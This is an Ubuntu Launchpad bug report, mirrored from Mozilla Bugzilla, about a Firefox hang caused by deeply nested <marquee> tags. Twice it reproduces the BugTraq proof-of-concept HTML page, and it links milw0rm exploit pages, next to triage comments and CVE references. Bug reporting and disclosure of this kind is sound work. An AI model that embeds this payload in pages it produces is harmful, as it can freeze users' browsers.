Ubuntu

Dos problem with marquee tag

Reported by Vincenzo Ampolo on 2006-05-31
4
Affects Status Importance Assigned to Milestone
Mozilla Firefox
Confirmed
Critical
firefox-3.0 (Ubuntu)
Medium
Unassigned
firefox (Ubuntu)
Medium
Unassigned

Bug Description

Hi,
as also reported on securityfocus at http://www.securityfocus.com/archive/1/435373/30/0/threaded using this kind of html page:

<html>

<head>

<title>Credit to n00b..</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee>

</body>

</html>

Firefox uses all the cpu resources and it becames not usable.
I've tested it in ubuntu dapper (upgraded from flight 6) on amd64 (firefox is at version 1.5.0.3)

CVE References

confirmed
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040402
Firefox/0.8.0+

Created attachment 148963
Attached testcase

Same testcase as mentioned before.

It hangs on my computer too, but when I have javascript turned off, it doesn't
hang.

I see this also in Mozilla1.7RC2

with a recent moz cvs trunk build all I see Javascript errors about too much
recursion, no "hang". fixed?

ok spoke too soon, will investigate

a slightly different testcase from bug 265027
https://bugzilla.mozilla.org/attachment.cgi?id=162508&action=view

no <dl>s just <marquee>s with huge height attributes.

I split the marquee hang from comment 6 into bug 288931 as it is very different

Ok, with current trunk build it doesn't hang anymore, it's just slow.
With Mozilla1.7, I hang, so something has definetely improved since then.

This is still an issue, confirmed with Firefox 1.5.0.3. Also, this issue has been posted to BugTraq (which is where I learned of it), so visibility is likely to soon rise.

A fix would really be a good thing.

Confirmed with Bon Echo using BugTraq example.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060530 BonEcho/2.0a3

Created attachment 223870
BugTraq Testcase

Should have attached this to my last post.

Confirmed using testcase on WinXP SP1 w/ FF 1.5.0.3. I saw this on BugTraq, also. I'm surprised this hasn't been fixed yet...

Hi,
as also reported on securityfocus at http://www.securityfocus.com/archive/1/435373/30/0/threaded using this kind of html page:

<html>

<head>

<title>Credit to n00b..</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body>

<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee>

</body>

</html>

Firefox uses all the cpu resources and it becames not usable.
I've tested it in ubuntu dapper (upgraded from flight 6) on amd64 (firefox is at version 1.5.0.3)

*** Bug 339954 has been marked as a duplicate of this bug. ***

Using BugTraq test case.

Confirmed in:

Firefox Current Release -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

Mozilla Latest Nightly -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050702

WFM in:

Firefox Latest Trunk Nightly -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060601 Minefield/3.0a1

Seems to be fixed in the trunk.

Confirmed for me in 1.5.0.4, WinXP/SP1.

fixing up title for searching (added nested, de-emphasizing DL tags), indicating relation to Bug #339954 .

Original title: "hang when many <dl> and <marquee> tags are used. exponential time increase depending on number of <dl> tags.."

New title: "hang when many nested <marquee> tags are used. exponential time increase"

*** Bug 339954 has been marked as a duplicate of this bug. ***

Dup of bug 277208? (Which is fixed on trunk, btw)

Can confirm that the first Attached testcase still hangs 2.0.

David

David Farning (dfarning) wrote :

I still get this behavior as of firefox 2.0. Critical bug open upstream.

David

Changed in firefox:
status: Unconfirmed → Confirmed

Was there anything in this bug to make you think it was fixed for 2.0?
https://bugzilla.mozilla.org/page.cgi?id=etiquette.html

(In reply to comment #18)
> Dup of bug 277208? (Which is fixed on trunk, btw)
>

Definitely not. Testcase still kills the trunk.

(In reply to comment #21)
> Definitely not. Testcase still kills the trunk.

Oops, yes, it is now crashing current trunk builds, this is something new, I filed bug 363722 for it. This bug is for the hanging issue (which may return after bug 363722 gets fixed).

Changed in firefox:
status: Unknown → Confirmed

This seems to have been assigned a CVE, though not specific to firefox: CVE-2006-6954

Alexander Sack (asac) wrote :

confirmed upstream bug is 'In Progress' for us.

Changed in firefox:
assignee: nobody → mozillateam
status: Confirmed → In Progress
David Farning (dfarning) on 2007-02-24
Changed in firefox:
assignee: mozillateam → mozilla-bugs

There are another example (exploit) on the following link

http://milw0rm.com/exploits/3606

The marquee tags are placed before the head tag.

... and earlier http://milw0rm.com/exploits/1867

CVE-2006-2723 is more appropriate, -6954 seems to be the Flock variant of the same thing.

It still happens quite frequently for me when opening certain myspace.com profiles. (with v2.0.0.11)

Thanks for the report, but please consider the Bugzilla etiquette guidelines before posting more "me too" comments in the future so that developers can more easily see the relevant information in a bug and so that people CCed to a bug (like myself) aren't needlessly spammed.
https://bugzilla.mozilla.org/page.cgi?id=etiquette.html

*** Bug 338474 has been marked as a duplicate of this bug. ***

*** Bug 432199 has been marked as a duplicate of this bug. ***

Alexander Sack (asac) on 2008-10-31
Changed in firefox:
assignee: mozilla-bugs → nobody
status: In Progress → Triaged
Changed in firefox-3.0:
importance: Undecided → Medium
status: New → Triaged
John Vivirito (gnomefreak) wrote :

This wont be fixed in firefox 2
I'm closing other firefox task due to neither this bug nor upstream have not been updated since 2007 and 2008
2008 is more than a year ago

Changed in firefox:
status: Triaged → Won't Fix
Changed in firefox-3.0:
status: Triaged → Won't Fix
Changed in firefox:
importance: Unknown → Critical
To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.